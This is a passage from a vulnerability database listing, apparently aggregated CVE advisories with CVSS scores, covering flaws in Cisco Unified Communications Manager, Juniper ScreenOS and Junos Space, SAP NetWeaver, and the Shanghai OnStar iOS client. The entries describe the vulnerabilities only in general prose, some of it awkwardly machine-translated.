A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an unauthenticated, remote attacker to perform a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the web-based management interface to click a link that is designed to submit malicious input to the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information on the targeted device. Cisco Bug IDs: CSCvg51264. Vendors have confirmed this vulnerability Bug ID CSCvg51264 It is released as.Information may be obtained and information may be altered. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution
| VAR-201801-1084 | CVE-2018-0014 | Juniper Networks ScreenOS Information disclosure vulnerability in devices |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25. Juniper Networks ScreenOS The device contains an information disclosure vulnerability. This vulnerability CVE-2003-0001 And related issues.Information may be obtained. Juniper ScreenOS is an operating system of Juniper Networks that runs on NetScreen series firewalls. There is a security vulnerability in Juniper ScreenOS 6.3.0r25, the vulnerability is caused by the program not filling the Ethernet packet with zero
| VAR-201801-1083 | CVE-2018-0013 | Juniper Networks Junos Space Network Management Platform Vulnerable to information disclosure |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A local file inclusion vulnerability in Juniper Networks Junos Space Network Management Platform may allow an authenticated user to retrieve files from the system. The platform enables automated configuration, monitoring and troubleshooting of devices and services throughout their lifecycle. An attacker could exploit this vulnerability to retrieve files from the system
| VAR-201801-1082 | CVE-2018-0012 | Junos Space Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Junos Space is affected by a privilege escalation vulnerability that may allow a local authenticated attacker to gain root privileges. Junos Space Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Juniper Junos Space is a set of network management solutions from Juniper Networks. The solution supports automated configuration, monitoring, and troubleshooting of devices and services throughout their lifecycle. An elevation of privilege vulnerability exists in Juniper Junos Space
| VAR-201801-1264 | CVE-2018-2363 | SAP NetWeaver Code injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user's choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials. Vendors have confirmed this vulnerability SAP Security Note 2525392 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state.
Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.
SAP Netweaver 7.00 through 7.02, 7.50 through 7.52, 7.10, 7.11, 7.30, 7.31, and 7.40 vulnerable
| VAR-201801-0960 | CVE-2017-12697 | General Motors - Shanghai OnStar of SOS iOS Client Vulnerable to information disclosure |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
A Man-in-the-Middle issue was discovered in General Motors (GM) and Shanghai OnStar (SOS) SOS iOS Client 7.1. Successful exploitation of this vulnerability may allow an attacker to intercept sensitive information when the client connects to the server. General Motors Shanghai OnStar is prone to multiple security vulnerabilities.
Shanghai OnStar 7.1 is vulnerable; other versions may also be affected
| VAR-201801-0959 | CVE-2017-12695 | General Motors - Shanghai OnStar of SOS iOS Client Authentication vulnerability |
CVSS V2: 4.0 CVSS V3: 8.8 Severity: HIGH |
An Improper Authentication issue was discovered in General Motors (GM) and Shanghai OnStar (SOS) SOS iOS Client 7.1. Successful exploitation of this vulnerability may allow an attacker to subvert security mechanisms and reset a user account password. General Motors Shanghai OnStar is prone to multiple security vulnerabilities.
An attackers may exploit these issues to gain unauthorized complete access to the affected application by bypassing intended security restrictions or perform man-in-the-middle attack to edit or view sensitive information that may aid in launching further attacks.
Shanghai OnStar 7.1 is vulnerable; other versions may also be affected